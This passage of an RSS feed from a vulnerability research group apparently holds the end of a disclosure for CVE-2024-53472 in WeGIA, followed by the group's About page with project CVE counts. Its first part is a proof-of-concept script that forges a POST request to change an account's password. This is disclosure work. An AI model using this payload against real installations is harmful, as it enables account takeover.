&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;head&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;https://demo.wegia.org/controle/control.php&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;            &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;method&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;POST&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;            &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;                &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Content-Type&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;application/x-www-form-urlencoded&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;            &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;},&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;            &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;senha_antiga=wegia&amp;amp;amp;nova_senha=1234567&amp;amp;amp;confirmar_senha=1234567&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;metodo=alterarSenha&amp;amp;amp;redir=logout.php&amp;amp;amp;id_pessoa=1&amp;amp;amp;alterar=Alterar&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;})&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;then&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;=&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;())&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;then&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;=&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;console&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;log&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;catch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;error&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;=&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;console&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;error&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Error:&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;error&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;));&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;body&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;solution&amp;#34;&amp;gt;Solution
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonLazarin/WeGIA/issues/790&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/790&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Cardoso Borda Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 05 Dec 2024 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>Archives</title>
        <link>https://www.cvehunters.com/archives/</link>
        <guid>https://www.cvehunters.com/archives/</guid>
        <description></description><content:encoded></content:encoded>
        <pubDate>Sun, 06 Mar 2022 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>About</title>
        <link>https://www.cvehunters.com/about/</link>
        <guid>https://www.cvehunters.com/about/</guid>
        <description>&amp;lt;div align=&amp;#34;center&amp;#34; width=100% &amp;gt;
&amp;lt;h1 id=&amp;#34;cve-hunters&amp;#34;&amp;gt;CVE Hunters
&amp;lt;/h1&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Vulnerability Research Group 🔎&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab&amp;#34; /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;h2 id=&amp;#34;&amp;#34;&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;div align=&amp;#34;justify&amp;#34;&amp;gt;
  &amp;lt;h3&amp;gt;Our Mission 🚀&amp;lt;/h3&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/I-6407ab&amp;#34; /&amp;gt; 
    Identify and document vulnerabilities in open-source projects widely used within the community, contributing to the continuous improvement of their information security posture;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/II-6407ab&amp;#34; /&amp;gt; 
    Promote the practical training of new professionals in the field of information security by providing students with realistic, hands-on experience in the processes of vulnerability identification, reporting, and remediation;
  &amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;div align=&amp;#34;center&amp;#34; width=100% &amp;gt;
&amp;lt;h1 id=&amp;#34;cve-hunters&amp;#34;&amp;gt;CVE Hunters
&amp;lt;/h1&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Vulnerability Research Group 🔎&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab&amp;#34; / /&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;h2 id=&amp;#34;&amp;#34;&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;div align=&amp;#34;justify&amp;#34;&amp;gt;
  &amp;lt;h3&amp;gt;Our Mission 🚀&amp;lt;/h3&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/I-6407ab&amp;#34; / /&amp;gt; 
    Identify and document vulnerabilities in open-source projects widely used within the community, contributing to the continuous improvement of their information security posture;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/II-6407ab&amp;#34; / /&amp;gt; 
    Promote the practical training of new professionals in the field of information security by providing students with realistic, hands-on experience in the processes of vulnerability identification, reporting, and remediation;
  &amp;lt;/p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://img.shields.io/badge/III-6407ab&amp;#34; / /&amp;gt; 
    Foster collaboration in the field of information security by encouraging other researchers to contribute to the publication of CVEs, thereby increasing the visibility of the projects and mitigating cybersecurity risks.
  &amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;h3 id=&amp;#34;contributed-projects&amp;#34;&amp;gt;Contributed Projects
&amp;lt;/h3&amp;gt;&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/wegia.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;WeGIA&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/i-educar.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;i-Educar&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/portabilis/i-diario&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/i-diario.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;i-Diário&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://uxwing.com/wp-content/themes/uxwing/download/brands-and-social-media/ruby-programming-language-icon.png&amp;#34; width=&amp;#34;20&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 92&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 81&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 14&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;br/ /&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.sourcecodester.com/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/sourcecodester.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SourceCodester&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://www.mercusys.com.br/&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/mercusys.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Mercusys&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/scada-lts.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;SCADA-LTS&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/9694/9694712.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn-icons-png.flaticon.com/512/226/226777.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 3&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 2&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 13&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;br/ /&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/centreon/centreon&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/centreon.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Centreon&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/getgrav/grav&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/grav.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Grav&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/indico/indico&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/indico.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Indico&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://www.php.net/images/logos/new-php-logo.png&amp;#34; width=&amp;#34;35&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;https://cdn.iconscout.com/icon/free/png-256/free-python-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-vol-5-pack-logos-icons-3030224.png?f=webp&amp;#34; width=&amp;#34;28&amp;#34;/ /&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 12&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 6&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;🛡️ CVEs: 1&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
  &amp;lt;/tbody&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;table border=&amp;#34;1&amp;#34; align=&amp;#34;center&amp;#34;&amp;gt;
  &amp;lt;tbody&amp;gt;
    &amp;lt;tr&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/mautic/mautic&amp;#34;&amp;gt;
          &amp;lt;img src=&amp;#34;/about/mautic.png&amp;#34; width=&amp;#34;100&amp;#34;/ /&amp;gt; &amp;lt;/br&amp;gt; &amp;lt;b&amp;gt;Mautic&amp;lt;/b&amp;gt;
        &amp;lt;/a&amp;gt;
      &amp;lt;/td&amp;gt;
      &amp;lt;td style=&amp;#34;text-align: center;&amp;#34;&amp;gt;
        &amp;lt;a href=&amp;#34;https://github.com/novosga/novosga&amp;#34;&amp;gt;
